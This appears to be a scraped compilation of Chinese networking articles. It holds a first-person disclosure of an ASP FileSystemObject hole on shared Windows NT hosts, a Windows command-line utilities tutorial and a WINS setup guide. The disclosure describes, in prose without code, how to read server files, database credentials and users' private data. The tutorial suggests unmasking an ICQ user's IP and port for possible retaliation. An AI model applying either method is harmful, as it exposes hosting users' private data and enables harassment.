对于图2，有人说还可以在Counter同AdminCenter之间再配置一个路由器。的确如此，如果在Counter同Admin之间再配置一个路由器ROUTER3，则对每一网络中的机器来说，各台计算机之间进行通过的路径就多了一条，使得在一条路径因拥挤或意外故障不畅通时，它们之间仍然可以照常通讯。这就要求网络中的每一台计算机配置成使用多个网关的情形。

返回


Windows NT网络服务器的ASP危机

《一键清理系统垃圾》

Windows NT网络服务器的ASP危机

    大家都知道一般免费主页提供商为了安全都不会提供浏览目录的权限，但我为了方便自己管理网站空间，所以自己就通过ASP中的“Scripting.File-SystemObject”对象编了一个可以浏览自己网站的文件和目录的ASP程序。刚开始的时候，我只是用这个程序来检查自己的文件，后来我忽然想到既然这个程序可以浏览自己网站的文件和目录，应该可以浏览服务器上的任何文件和目录吧?心动不如手动，于是就把这个程序略微修改一下，试一试可不可以浏览服务器上的文件和目录。我首先是在汕头的服务器执行这个程序，果然不出我的所料，汕头的服务器上硬盘的所有文件和目录都出现在我的电脑屏幕上，就像操作自己本机上的文件和目录一样方便。当时我的心为之一震，心想要读出服务器的文件和目录原来是如此容易，但只是读出了目录结构是没有多大的用处，读出了目录结构的目的是为了知道服务器上的WEB站点ASP程序所在的位置，方便我将这些ASP程序的源代码读出（因为ASP程序是在服务器端执行的，在客户端是无法察看其源代码，客户端所看到的只不过是ASP程序执行的结果），由于ASP文件是文本格式的，我只要通过 “Scripting.FileSystemObject”对象把ASP文件的内容读出即可察看其源代码。由于主页提供商一般都是将该服务器上用户信息存储在数据库中的，我只要知道了ASP程序中的内容就可以知道该数据库的一些信息，如：使用什么类型的数据库（SQL或MS ACCESS），SQL数据库的用户名和密码，ACCESS数据库（*.mdb）文件所在的位置等信息，于是我再编写了一个ASP程序通过这些信息来访问数据库，即可以知道服务器上用户信息：用户名、密码、身份证号码、电话号码、地址等私人信息。由于一般的人的许多密码都是相同的，所以知道他一个密码就等于知道他所有的密码，例如：电子邮箱、上网帐号等的密码，如此一来，这些用户的利益就会受到损害。后来我又将这个程序在别的免费主页提供商的服务器上执行，发现多个免费主页提供商都出现这些漏洞，包括外国比较出名的免费主页提供商：domaindlx.com，所以我借此机会公布这个漏洞，使各提供免费主页并开放执行ASP程序权限的主页提供商提高警惕赶快做出防御措施，以防类似的情况发生（因为我也是受害者，有个网友已经通过我这个程序成功获得我的帐号和密码，黑了我的网站，大家可以对照一下http://169boy.163.net/和http://169boy.on.net.cn/）。

    不但这一类免费主页服务的网站存在这些漏洞，就是ISP提供的虚拟主机也有这些漏洞——只要服务器的操作系统是Windows NT，并对用户开放执行ASP权限都存在这些漏洞。因为虚拟主机也是多个用户用同一部服务器，如果有某个用户不怀好意，那么这部服务器所有用户都遭殃，虽然我没有测试虚拟主机，但我想结果也是一样的，所以提供的虚拟主机的ISP需要认真测试（因为某些原因，我不能公开测试程序的源代码）。

    其实把“Scripting.FileSystemObject”对象封了，就可以解决这些漏洞，用读写数据库来代替“Scripting.FileSystemObject”对象就可，毕竟“Scripting.FileSystemObject”对象都不是很安全，也不是必须的。

    由于本人不是黑客，并没有损害任何单位和个人的利益的意图，只是尽一个网民的义务才将这个漏洞公布，其中并没有违反任何的法律，如果有任何单位和个人通过这个漏洞去损害别人的利益与本人无关。

返回


Windows网络实用工具大集合

《一键清理系统垃圾》

Windows网络实用工具大集合

    Ping是个使用频率极高的实用程序，用于确定本地主机是否能与另一台主机交换（发送与接收）数据报。根据返回的信息，你就可以推断TCP/IP参数是否设置得正确以及运行是否正常。需要注意的是：成功地与另一台主机进行一次或两次数据报交换并不表示TCP/IP配置就是正确的，你必须执行大量的本地主机与远程主机的数据报交换，才能确信TCP/IP的正确性。
    简单的说，Ping就是一个测试程序，如果Ping运行正确，你大体上就可以排除网络访问层、网卡、MODEM的输入输出线路、电缆和路由器等存在的故障，从而减小了问题的范围。但由于可以自定义所发数据报的大小及无休止的高速发送，Ping也被某些别有用心的人作为DOS（拒绝服务攻击）的工具，前段时间Yahoo就是被黑客利用数百台可以高速接入互联网的电脑连续发送大量Ping数据报而瘫痪的。
    按照缺省设置，Windows上运行的Ping命令发送4个ICMP（网间控制报文协议）回送请求，每个32字节数据，如果一切正常，你应能得到4个回送应答（见图1）。
    Ping能够以毫秒为单位显示发送回送请求到返回回送应答之间的时间量。如果应答时间短，表示数据报不必通过太多的路由器或网络连接速度比较快。Ping还能显示TTL（Time To Live存在时间）值，你可以通过TTL值推算一下数据包已经通过了多少个路由器：源地点TTL起始值（就是比返回TTL略大的一个2的乘方数）减去返回时TTL值。例如，返回TTL值为119，那么可以推算数据报离开源地址的TTL起始值为128，而源地点到目标地点要通过9个路由器网段（128-119）；如果返回TTL值为246，TTL起始值就是256，源地点到目标地点要通过9个路由器网段。

    通过Ping检测网络故障的典型次序

    正常情况下，当你使用Ping命令来查找问题所在或检验网络运行情况时，你需要使用许多Ping命令，如果所有都运行正确，你就可以相信基本的连通性和配置参数没有问题；如果某些Ping命令出现运行故障，它也可以指明到何处去查找问题。下面就给出一个典型的检测次序及对应的可能故障：
    ping 127.0.0.1——这个Ping命令被送到本地计算机的IP软件，该命令永不退出该计算机。如果没有做到这一点，就表示TCP/IP的安装或运行存在某些最基本的问题。
    ping 本机IP——这个命令被送到你计算机所配置的IP地址，你的计算机始终都应该对该Ping命令作出应答，如果没有，则表示本地配置或安装存在问题。出现此问题时，局域网用户请断开网络电缆，然后重新发送该命令。如果网线断开后本命令正确，则表示另一台计算机可能配置了相同的IP地址。
    ping 局域网内其他IP——这个命令应该离开你的计算机，经过网卡及网络电缆到达其他计算机，再返回。收到回送应答表明本地网络中的网卡和载体运行正确。但如果收到0个回送应答，那么表示子网掩码（进行子网分割时，将IP地址的网络部分与主机部分分开的代码）不正确或网卡配置错误或电缆系统有问题。
    ping 网关IP——这个命令如果应答正确，表示局域网中的网关路由器正在运行并能够作出应答。
    ping 远程IP——如果收到4个应答，表示成功的使用了缺省网关。对于拨号上网用户则表示能够成功的访问Internet（但不排除ISP的DNS会有问题）。
    ping localhost——localhost是个操作系统的网络保留名，它是127.0.0.1的别名，每台计算机都应该能够将该名字转换成该地址。如果没有做到这一带内，则表示主机文件（/Windows/host）中存在问题。
    ping www.yahoo.com——对这个域名执行Ping命令，你的计算机必须先将域名转换成IP地址，通常是通过DNS服务器（关于DNS本刊2000年3期有详述）。如果这里出现故障，则表示DNS服务器的IP地址配置不正确或DNS服务器有故障（对于拨号上网用户，某些ISP已经不需要设置DNS服务器了）。顺便说一句：你也可以利用该命令实现域名对IP地址的转换功能（见图2）。
    如果上面所列出的所有Ping命令都能正常运行，那么你对你的计算机进行本地和远程通信的功能基本上就可以放心了。但是，这些命令的成功并不表示你所有的网络配置都没有问题，例如，某些子网掩码错误就可能无法用这些方法检测到。

     Ping命令的常用参数选项
    ping IP -t——连续对IP地址执行Ping命令，直到被用户以Ctrl+C中断。
    ping IP -l 2000——指定Ping命令中的数据长度为2000字节，而不是缺省的32字节。
    ping IP -n——执行特定次数的Ping命令。

    Netstat

    Netstat用于显示与IP、TCP、UDP和ICMP协议相关的统计数据，一般用于检验本机各端口的网络连接情况。
    如果你的计算机有时候接收到的数据报导致出错数据或故障，你不必感到奇怪，TCP/IP可以容许这些类型的错误，并能够自动重发数据报。但如果累计的出错情况数目占到所接收的IP数据报相当大的百分比，或者它的数目正迅速增加，那么你就应该使用Netstat查一查为什么会出现这些情况了。

    Netstat的一些常用选项
    netstat -s——本选项能够按照各个协议分别显示其统计数据。如果你的应用程序（如Web浏览器）运行速度比较慢，或者不能显示Web页之类的数据，那么你就可以用本选项来查看一下所显示的信息。你需要仔细查看统计数据的各行，找到出错的关键字，进而确定问题所在（见图3）。
    netstat -e——本选项用于显示关于以太网的统计数据。它列出的项目包括传送的数据报的总字节数、错误数、删除数、数据报的数量和广播的数量。这些统计数据既有发送的数据报数量，也有接收的数据报数量。这个选项可以用来统计一些基本的网络流量（见图4）。
    netstat -r——本选项可以显示关于路由表的信息，类似于后面所讲使用route print命令时看到的 信息。除了显示有效路由外，还显示当前有效的连接。
    netstat -a——本选项显示一个所有的有效连接信息列表，包括已建立的连接（ESTABLISHED），也包括监听连接请求（LISTENING）的那些连接。
    netstat -n——显示所有已建立的有效连接。

    Netstat的妙用
    经常上网的人一般都使用ICQ，不知道你有没有被一些讨厌的人骚扰得不敢上线，想投诉却又不知从何下手？其实，你只要知道对方的IP，就可以向他所属的ISP投诉了。但怎样才能通过ICQ知道对方的IP呢？如果对方在设置ICQ时选择了不显示IP地址，那你是无法在信息栏中看到的。其实，你只需要通过Netstat就可以很方便的做到这一点：当他通过ICQ或其他的工具与你相连时（例如你给他发一条ICQ信息或他给你发一条信息），你立刻在DOS Prompt下输入netstat -n或netstat -a就可以看到对方上网时所用的IP或ISP域名了（见图5最后一行）。甚至连所用Port都完全暴露了，如果你想给他一些教训，这些信息已经足够……

    IPConfig

    IPConfig实用程序和它的等价图形用户界面——Windows 95/98中的WinIPCfg可用于显示当前的TCP/IP配置的设置值。这些信息一般用来检验人工配置的TCP/IP设置是否正确。但是，如果你的计算机和所在的局域网使用了动态主机配置协议（Dynamic Host Configuration Protocol，DHCP——Windows NT下的一种把较少的IP地址分配给较多主机使用的协议，类似于拨号上网的动态IP分配），这个程序所显示的信息也许更加实用。这时，IPConfig可以让你了解你的计算机是否成功的租用到一个IP地址，如果租用到则可以了解它目前分配到的是什么地址。了解计算机当前的IP地址、子网掩码和缺省网关实际上是进行测试和故障分析的必要项目。

    最常用的选项
    ipconfig——当使用IPConfig时不带任何参数选项，那么它为每个已经配置了的接口显示IP地址、子网掩码和缺省网关值，如图6的上半部分。
    ipconfig /all——当使用all选项时，IPConfig能为DNS和WINS服务器显示它已配置且所要使用的附加信息（如IP地址等），并且显示内置于本地网卡中的物理地址（MAC）。如果IP地址是从DHCP服务器租用的，IPConfig将显示DHCP服务器的IP地址和租用地址预计失效的日期（有关DHCP服务器的相关内容请详见其他有关NT服务器的书籍或询问你的网管），其输出信息见图6的下半部分。
    ipconfig /release和ipconfig /renew——这是两个附加选项，只能在向DHCP服务器租用其IP地址的计算机上起作用。如果你输入ipconfig /release，那么所有接口的租用IP地址便重新交付给DHCP服务器（归还IP地址）。如果你输入ipconfig /renew，那么本地计算机便设法与DHCP服务器取得联系，并租用一个IP地址。请注意，大多数情况下网卡将被重新赋予和以前所赋予的相同的IP地址。
    如果你使用的是Windows 95/98，那么你应该更习惯使用winipcfg而不是ipconfig，因为它是一个图形用户界面，而且所显示的信息与ipconfig相同，并且也提供发布和更新动态IP地址的选项（见图7，全部详细资料见图8）。如果你购买了Windows NT Resource Kit（NT资源包），那么Windows NT也包含了一个图形替代界面，该实用程序的名字是wntipcfg，和Windows 95/98的winipcfg类似。

    ARP（地址转换协议）

    ARP是一个重要的TCP/IP协议，并且用于确定对应IP地址的网卡物理地址。使用arp命令，你能够查看本地计算机或另一台计算机的ARP高速缓存中的当前内容。此外，使用arp命令，也可以用人工方式输入静态的网卡物理/IP地址对，你可能会使用这种方式为缺省网关和本地服务器等常用主机进行这项操作，有助于减少网络上的信息量。
    按照缺省设置，ARP高速缓存中的项目是动态的，每当发送一个指定地点的数据报且高速缓存中不存在当前项目时，ARP便会自动添加该项目。一旦高速缓存的项目被输入，它们就已经开始走向失效状态。例如，在Windows NT网络中，如果输入项目后不进一步使用，物理/IP地址对就会在2至10分钟内失效。因此，如果ARP高速缓存中项目很少或根本没有时，请不要奇怪，通过另一台计算机或路由器的ping命令即可添加。所以，需要通过arp命令查看高速缓存中的内容时，请最好先ping此台计算机（不能是由本机发送ping命令）。

    常用命令选项
    arp -a或arp -g——用于查看高速缓存中的所有项目。-a和-g参数的结果是一样的，多年来-g一直是UNIX平台上用来显示ARP高速缓存中所有项目的选项，而Windows用的是arp -a（-a可被视为all，即全部的意思），但它也可以接受比较传统的-g选项。
    arp -a IP——如果你有多个网卡，那么使用arp -a加上接口的IP地址，就可以只显示与该接口相关的ARP缓存项目。
    arp -s IP 物理地址——你可以向ARP高速缓存中人工输入一个静态项目。该项目在计算机引导过程中将保持有效状态，或者在出现错误时，人工配置的物理地址将自动更新该项目。
    arp -d IP——使用本命令能够人工删除一个静态项目。
    以上参数的综合应用详见图9、图10。
    看到这里，你也许已经有些累了……其实对于一般用户来说也已经足够——你可以用ipconfig和ping命令来查看自己的网络配置并判断是否正确、可以用netstat查看别人与你所建立的连接并找出ICQ使用者所隐藏的IP信息、可以用arp查看网卡的MAC地址——这些已足已让你丢掉菜鸟的头衔。如果你并不满足，那就“硬着头皮”（下面的内容可能有些枯燥）继续Follow me……

    Tracert

    当数据报从你的计算机经过多个网关传送到目的地时，Tracert命令可以用来跟踪数据报使用的路径。该实用程序跟踪的路径是源计算机到目的地的一条路径，不能保证或认为数据报总遵循这个路径。如果你的配置使用DNS，那么你常常会从所产生的应答中得到城市、地址和常见通信公司的名字。Tracert是一个运行得比较慢的命令（如果你指定的目标地址比较远），每个路由器你大约需要给它15秒钟（图11是Tracert的一个运行结果）。
    Tracert的使用很简单，只需要在tracert后面跟一个IP地址或URL，Tracert会进行相应的域名转换的。Tracert一般用来检测故障的位置，你可以用tracert IP来查找在哪个环节上出了问题，虽然还是没有确定是什么问题，但它已经告诉了我们问题所在的地方，你也就可以很有把握的告诉别人——某处出了问题。

    Route

    大多数主机一般都是驻留在只连接一台路由器的网段上。由于只有一台路由器，因此不存在使用哪一台路由器将数据报发表到远程计算机上去的问题，该路由器的IP地址可作为网段上所有计算机的缺省网关来输入。
    但是，当网络上拥有两个或多个路由器时，你就不一定想只依赖缺省网关了。实际上你可能想让你的某些远程IP地址通过某个特定的路由器来传递，而其他的远程IP则通过另一个路由器来传递。
在这种情况下，你需要相应的路由信息，这些信息储存在路由表中，每个主机和每个路由器都配有自己独一无二的路由表。大多数路由器使用专门的路由协议来交换和动态更新路由器之间的路由表。但在有些情况下，必须人工将项目添加到路由器和主机上的路由表中。Route就是用来显示、人工添加和修改路由表项目的一个实用程序。

    一般使用选项
    route print——本命令用于显示路由表中的当前项目，在单路由器网段上的输出结果如图12，由于用IP地址配置了网卡，因此所有的这些项目都是自动添加的。
    route add——使用本命令，可以将新路由项目添加给路由表。例如，如果要设定一个到目的网络209.98.32.33的路由，其间要经过5个路由器网段，首先要经过本地网络上的一个路由器，其IP为202.96.123.5，子网掩码为255.255.255.224，那么你应该输入以下命令：
route add 209.98.32.33 mask 255.255.255.224 202.96.123.5 metric 5
    route change——你可以使用本命令来修改数据的传输路由，不过，你不能使用本命令来改变数据的目的地。下面这个例子可以将数据的路由改到另一个路由器，它采用一条包含3个网段的更直的路径：
route add 209.98.32.33 mask 255.255.255.224 202.96.123.250 metric 3
    route delete——使用本命令可以从路由表中删除路由。例如：route delete 209.98.32.33

    NBTStat

    NBTStat（TCP/IP上的NetBIOS统计数据）实用程序用于提供关于NetBIOS的统计数据。运用NetBIOS，你可以查看本地计算机或远程计算机上的NetBIOS名字表格。

    常用选项
    nbtstat -n——显示寄存在本地的名字和服务程序（见图13）。
    nbtstat -c——本命令用于显示NetBIOS名字高速缓存的内容。NetBIOS名字高速缓存用于存放与本计算机最近进行通信的其他计算机的NetBIOS名字和IP地址对。
    nbtstat -r——本命令用于清除和重新加载NetBIOS名字高速缓存。
    nbtstat -a IP——通过IP显示另一台计算机的物理地址和名字列表，你所显示的内容就像对方计算机自己运行nbtstat -n一样（见图14）。
    nbtstat -s IP——显示使用其IP地址的另一台计算机的NetBIOS连接表。

    Net

    Net命令有很多函数用于使用和核查计算机之间的NetBIOS连接。这里我只介绍最常用的两个：net view和net use。
    net view UNC——运用此命令，你可以查看目标服务器上的共享点名字。任何局域网里的人都可以发出此命令，而且不需要提供用户ID或口令。UNC名字总是以\\开头，后面跟随目标计算机的名字。例如，net view \\lx就是查看主机名为lx的计算机的共享点（见图15）。
    net use 本地盘符 目标计算机共享点——本命令用于建立或取消到达特定共享点的映像驱动器的连接（如果需要，你必须提供用户ID或口令）。例如，你输入net use f: \\lx\mp3就是将映像驱动器F:连接到\\lx\mp3共享点上，今后你直接访问F:就可以访问\\lx\mp3共享点，这和你右击“我的电脑”选择映射网络驱动器类似。

    ftp

    相信现在做主页的朋友对ftp都很熟悉，ftp的英文名字就是File Transfer protocol（文件传输协议），可以这么说，网络上的最大的资源就是放在ftp服务器上的，如果你懂得ftp，你才真正的可以随心所欲地利用网络资源，你做好的主页就要利用ftp上传。现在Linux很盛行，想要下载一个，找一个ftp站点去……
ftp常见的命令有几十个，一下子也说不清楚，我们现在就去一个ftp站点下载一个软件吧：
    打开Windows的“运行窗口”，输入ftp ftp.cd-rom.com，如图16，说明你已经来到了cdrom的ftp站点（这可是网络上最大的ftp站点，Slackware的老家），输入你的用户名（由于我们在这里没有账号，所以可以利用匿名登录，输入anonymous），口令就输入你的E-mail地址可以了，然后出现在我们面前的就是cdrom对自己站点的介绍和一些欢迎信息。
    看着黑乎乎的画面，感觉不知道怎么办好？
    试着输入“pwd”来看看你当前所在的路径，呵呵……你在他们默认的目录/pub下边；
ls 可以列出他们站点上提供的软件的目录；
    cd /pub/win95/compress 来到他们用于Win95的压缩软件下载区，重新使用ls看一看都有些什么，好像有一个wrar260.exe，这个压缩软件可是我找了很久的，下载下来；
    get wrar260.exe 下载wrar260.exe;
    mget *.* 将当前目录下的所有文件全部下载；
    put wrar260.exe 将你本地的wrar260.exe传到服务器上边去；
    mput *.* 将当前目录下的所有文件全部上传；到这里，基本的ftp命令你已经学会了，还想要深学一点，呵呵……
    在提示符下边输入?试一试，所有本地命令全部显示出来，还想要看看远方机器准许你执行那些命令，输入remotehelp试一试？还是很多命令，但是这些可是远程机器上边的命令，你如果要执行，只要在命令前加上一个quote就可以了……，输入quote SYST，呵呵……出现以下信息：
    215 UNIX Type: L8 Version: BSD-199506（原来cdrom是架设在FreeBSD上边的）

    Telnet
    这个命令实际上是一个远程管理命令，如果你在一个Unix系统上有root的权限，你甚至可以直接将机器关闭，打开“运行”窗口，输入telnet 主机名，你就可以登录到一个远方的机器上（见图17），然后你就可以执行系统准许你执行的命令了，不过Windows自带的telnet确实很难用，在登录窗口，你输入的字符全部都是双个的出现，我还从来没有用Windows自带的telnet登录到任何的一个机器上呢？还是用Cterm和Netterm吧！


WINS 服务器的安装与设置

《一键清理系统垃圾》

WINS 服务器的安装与设置

本章主要内容：
1. WINS 服务的基本概念
2. WINS的运行方式
3. WINS 服务的新特性
4. 安装 WINS 服务器
5. 配置 WINS 服务器
6. WINS 数据库的复制
7. 静态映射的管理
8. WINS数据管理
9. 将WINS移植到 DNS
10.启动客户机的WINS

    12.1 WINS 服务的基本概念
    在 TCP/I P网络中，为解决计算机名称于IP地址的对应问题，用户可以利用 HOST 文件、DNS 等方式，但使用这些方法都存在着一个最大的问题，就是网络管理员需要以手工方式将计算机名称 (NetBIOS名) 及其 IP 地址一一输入到计算机中，一旦某台计算机的名称或 IP 地址发生变化，管理员又需要修改相应的设置。这对于管理员来说是一项繁重的工作。而微软提供的网际名称服务 WINS 解决了这个问题。利用它可以让客户机在启动时主动的将它的计算机名称 (NetBIOS名) 及IP地址注册到 WINS 服务器的数据库中，在 WINS 客户机之间通信的时候它们可以通过 WINS 服务器的解析功能获得对方的 IP 地址。由于以上工作全部由 WINS 客户机与服务器自动完成的所以大大降低了管理员的工作负荷，同时也减少了网络中的广播。在理解及使用 WINS 之前用户首先应该了解计算机名称 (NetBIOS名) 的一些知识。

12.1.1 定义计算机名(NetBIOS名)
    NetBIOS 是 80 年代末为了利用 IBM Pc 构建局域网而出现的一种 MS-DOS 程序的高级语言接口。为了利用网络硬件和软件将这些计算机连接在一起组成局域网，微软和其它供应商利用 NetBIOS 接口来设计它们的网络组件和程序。NetBIOS 接口利用最多为 16 个字符的名称来标识每一个网络资源。
    在一个网络中 NetBIOS 名是唯一的。在计算机启动、服务被激活、用户登录到网络时， NetBIOS 名将被动态的注册到数据库中。NetBIOS 可以以独立名称的形式注册，也可以以组名称的形式注册。以单机名注册时要有一个 IP 地址与其相对应，如以组名称注册时会有多个 IP 地址与其对应。
    在 Windows 2000 发布前的所有基于 MS-DOS 和 Windows 的操作系统都需要使用 NetBIOS 名称接口以便网络可以正常工作。伴随着 Windows 2000 的发布,网络中的计算机不再需要 NetBIOS 名称接口的支持。如在 Windows 2000 和一些 UNIX 版本的网络中它们只要求客户机支持 DNS 使用就可以了，不再需要 NetBIOS 名。但为了与以前版本的网络操作系统结合使用，微软在 Windows 2000 中仍然支持 NetBIOS 名，以便与以前版本的操作系统协同使用，微软通过两方面实现对 NetBIOS 名的支持：
§　所有使用 Windows 2000 的客户机在默认情况下都支持利用客户端的 WINS 服务注册和解析 NetBIOS 名。
§　Windows 2000 服务器继续提供一个高效的WINS服务器，用它来管理网络中的 NetBIOS 名。

定义 NetBIOS 名称
NetBIOS 名称包含 16 字节。前 15 个字节是由用户指定的，用它来表示：
§　网络上的单个用户或计算机
§　网络上的一组用户或计算机
    在 NetBIOS 名中的第 16 个字符作为名称的后缀，用于识别名称及显示注册名称的信息。NetBIOS 名可以被设置为独立名称或组名称。
    在使用独立名称时，是将网络信息发送给一台计算机，而使用组名称是将网络信息同时发送给多台计算机。
    在 Windows NT 早期版本中,所有的网络服务都是利用 NetBIOS 名注册的。而在 Windows 2000 中,登录网络及其它的网络服务都是在 DNS 中进行注册的。

    12.1.2 NetBIOS 名的解析
    NetBIOS 名的解析就是将计算机的 NetBIOS 名成功的与IP地址进行映射的过程。从上面用户已经知道 NetBIOS 名是用来识别网络上NetBIOS 资源由 16 个字符组成的地址。让用户通过下面这个例子了解 NetBIOS 名是如何解析的。
    一台 Windows 2000 的计算机（CORPSERVER）中运行的文件与打印共享服务的 NetBIOS 名的解析过程。当计算机启动时文件与打印共享服务利用计算机名在网络上注册一个独立 NetBIOS 名。这个 NetBIOS 名前 15 位字符是计算机名，第 16 位字符为 0x20。如果计算机名不够 15 个字符，那么利用空格补齐。(即：CORPSERVER [20])。当用户试图与这台计算机的共享文件夹建立通信时必须指明它的文件与打印共享的 NetBIOS 名。在建立文件与打印共享连接前，首先要建立 TCP 连接，为了建立 TCP 连接首先要将 NetBIOS 名(即：CORPSERVER [20])解析成 IP 地址。

    WINS 客户机主要利用广播、LMHOSTS 文件、WINS 服务器三种方式的组合解决 NetBIOS 名解析的问题，根据组合方式的不同分成了四种 NetBIOS node 模式，见下表：

Node 模式

描述

B-node(broadcast)

    B-node 用户利用广播 NetBIOS 名查询的方法实现名称的注册和解析；在广播失败后，查询Lmhosts文件，寻找相应的地址

P-node (peer-peer)

    利用点对点的方式直接向 WINS 服务器查询相应 NetBIOS 名的 IP 地址。

M-node(mixed)

    M-node 是把 B-node 和 P-node组合在一起。默认情况下使用广播的方式，如果失败，再向 WINS 服务器进行查询。

H-node(hybrid)

    H-node 是把 B-node 和 P-node 组合在一起。默认情况下向 WINS 服务器进行查询，如果失败，再使用广播的方式。如果 两种方法都失败，则查询 Lmhosts 文件,寻找相应的地址。

    运行 Windows 2000 的计算机默认使用 B-node 模式，当为它们设置了 WINS 服务器后，改用 H-node 模式。Windows 2000 也能使用本地数据库文件 Lmhosts 解析 NetBIOS 名。此文件存放在： SystemRoot\System32\Drivers\Etc 文件夹中。
    用户一定要为基于活动目录的 Windows 2000 计算机设置一个WINS服务器的 IP 地址，以便它们可以与无法使用活动目录的 Windows NT 、 Windows 2000, Windows 95、 Windows 98 计算机进行通信。

    12.2 WINS 的运行方式
    WINS 为注册及查询计算机和组的动态映射 NetBIOS 名提供了一个分布式数据库，WINS 在 NetBIOS 名与 IP 地址之间建立映射，他是基于 TCP/IP 网络中 NetBIOS 名解析的最佳选择。
    12.2.1 WINS 客户机与服务器的通信目的：
§　在 WINS 客户机启动时它将计算机名、IP 地址、DNS 域名等数据注册到 WINS 服务器的数据库中。

§　当客户机需要与其它客户机通信时，它可以从 WINS 服务器取得所须的计算机名称、IP 地址、DNS 域名。
    12.2.2 WINS 客户机的名称注册
    让用户通过一个例子来了解名称注册的过程
    如图 12.1 WINS 客户机(HOST-C) 直接向 WINS 服务器（WINS-A）发送名称注册请求。
    WINS-A 可以通过向 HOST-C "接收"或"拒绝"的回答表示它对注册请求的接受或拒绝。服务器是通过以下因素来作出回答的：
§　在 WINS-A 的数据库中是否已存在此名称
§　请求的名称是独立名称还是组名称

如果名称不在数据库中，则接受这个新注册，并进行以下操作：
    1. 将 HOST-C 名输入到数据库中，并添加一个时间戳及标记上WINS服务器所有者的 ID。
时间戳是用来计算更新间隔的（默认为：6天）
    2. 向 HOST-C 发送接受注册的回答，在回答信息中还包含客户机可以使用此名称的时间 (TTL)
如果 HOST-C 的名称已经存在于数据库中且与请求的IP地址相同，那么就由已存在名称的情况和所有权决定：
    1. 如果数据库中的记录标记为"活动"切归服务器 (WINS-A)所有, 则服务器更新该记录的时间戳并向客户机发送"接受"回答。
    2. 如果数据库中的记录被标记为"释放、过期"或记录归另一个 WINS 服务器所有，则当前注册被作为新注册来处理，时间戳、所有者、版本 ID 等全部更新，并向客户机发送"接受"回答。
如果 HOST-C 的名称已经存在于数据库中但与请求的 IP 地址不同，WINS 服务器必须避免重名的发生，如果数据库中的记录已被标记为过期或释放，那么可以接受注册请求。但当记录仍为活动状态时，WINS 服务器(WINS-A)需要向网络上注册该名称的客户机咨询（challenge）,以便确定它是否还在网络上，具体操作如下：
    1. WINS-A 首先向客户机(HOST-C)发送一个等待确认的回答(WACK)，并利用TTL指定等待时间。
    2. WINS-A 接着向注册此名称的客户机发送一个名称查询请求。
    3. 如果客户机仍然在网络上，它会给服务器WINS-A 发送一个确认回答。
    4. WINS-A, 向客户机(HOST-C)发送拒绝名称注册的回答，以拒绝客户机的名称注册请求。
    5. 如果服务器 WINS-A 的查询请求没有得到相应的回答，它再同时发出两个查询请求，如果三次查询均未得到回答，那么查询过程结束，服务器 WINS-A 向客户机(HOST-C) 发送确认回答，接受客户机的名称请求，并更新数据库中的记录。

12.2.3 WINS 客户机释放（Release）名称
当 WINS 客户机(HOST-C)关机时，它将通知服务器它将不再使用它的注册名，具体操作如下：
    1. 当客户机（HOST-C）关机后用户在命令行输入 nbtstat -RR 命令时，客户机将向服务器（WINS-A）发送一个释放请求。
    2. 服务器（WINS-A）将数据库中有关客户机（HOST-C）的记录标记为释放。
    3. WINS-A 向客户机（HOST-C）发送一个释放确认消息。r
如果名称记录被标记为释放，当其它客户机以相同名称但不同IP地址注册时，服务器可以立即更新记录。
    12.2.4 WINS 客户机更新名称注册
    为确保 WINS 客户机的注册名称在 WINS 服务器的数据库中为"活动"状态，客户机必须定期更新它的注册名称。
    当客户机第一次在向服务器中注册名称时，从服务器返回的确认信息中的 TTL（Time-To-Live）值指定了客户机何时相应更新注册。如果在指定时间内客户机没有更新它的注册，服务器将从它数据库中删除客户机的记录。WINS 数据库中的默认更新时间为 6 天，当更新时间（TTL）达到一半时客户机相应向服务器更新它的注册名称。

12.3 WINS 服务的新特性
微软在 Windows 2000 中, 对 WINS 服务的以下特点进行了改进：
    持续而稳固的连接
配置 WINS 服务器与一个或多个复制伙伴保持持续连接，从而加快了复制速度，消除了由于每次建立和断开连接所带来的开销。
    手工设置记录为"过期"
可以利用手工将记录状态设置为"过期"，避免了服务器间复制记录时继续传播服务器中未被删除的记录副本。
    增强的管理工具
WINS 管理器集成在微软管理控制台中，功能更为强大，操作更加简便，易学易用。
    记录查找和筛选功能的增强
对筛选功能的加强以及新增的记录查找功能，让用户能够更为快速准确的查看符合条件的记录，对分析大型的 WINS 数据库非常有益。

动态的选择多个记录及记录删除
通过 WINS 插件，现在可以快捷的选定和删除单个或多个静态或动态类型的 WINS 项。
    数据库导出功能
现在可以将 WINS 数据库以文本的形式导出到相应的程序（如：EXCEL、报告工具、教本程序等）中进行分析及生成统计报表。
    增强客户的容错性
Windows 2000 or Windows 98 客户机最多可以指定 12 个 WINS 服务器，在主辅 WINS 服务器均不响应时，使用附加的 WINS 服务器，从而增强了容错性。
    客户机动态的更新 NetBIOS 名
WINS 客户机在 WINS 服务器中重新注册 NetBIOS 名后，无需重新启动，在 Windows 2000 中利用 NBTSTAT 命令中的新增选项－ RR 可以动态更新 NetBIOS 名，Windows NT 4.0 的 Service Pack4 及以上版本也提供了此功能。
    利用只读控制台访问 WINS 管理器
在安装 WINS 服务时自动添加了一个具有特殊目的的本地组- WINS 用户组，这个组的成员可以在管理员不在的情况下通过只读方式访问服务器上 WINS 管理器查看 WINS 服务的相关信息。

12.4 安装 WINS 服务器
    注意：在安装 WINS 服务器之前，首先要确定 WINS 服务器本身的 IP 地址是固定的 IP 地址。
    12.4.1 安装 WINS 服务器
    步骤1 启动"开始→设置→控制面板→添加/删除程序"，之后出现"添加/删除程序"对话框
    步骤2单击"添加/删除 Windows 组件→组件"，出现"windows 组件向导→下一步"出现" Windows 组件"对话框从列表中选择"网络服务" 如图 12.2

步骤3 单击"详细内容"，从列表中选取"Windows Internet 命名访问（WINS）" 如图 12.3单击"确定"
    步骤4 单击"下一步"，输入到 Windows2000 Server 的安装源文件的路径，单击"确定"开始安装 WINS 服务
    步骤5 单击"完成"，当回到"添加/删除程序"对话框后，单击"关闭"按钮
    安装完毕后在管理工具中多了一个 "WINS" 控制台

12.4.2 启动和停止 WINS 服务
    步骤：启动 "计算机管理"单击"系统工具"选择"服务"，然后在右侧窗体中右击 "Windows Internet 命名服务"选择启动/停止
    用户也可以利用如下命令完成上述操作：
net start wins
net stop wins
net pause wins
net continue wins

12.4.3 在 WINS 控制台种添加 WINS 服务器
    步骤：启动"WINS 控制台然后单击 "WINS"，单击"操作"菜单选择"添加服务器"，在"添加服务器"对话框中填写服务器名或 IP 地址单击"确定"
    这样在 WINS 管理控制台中添加了一台 WINS 服务器，如图 12.4 所示
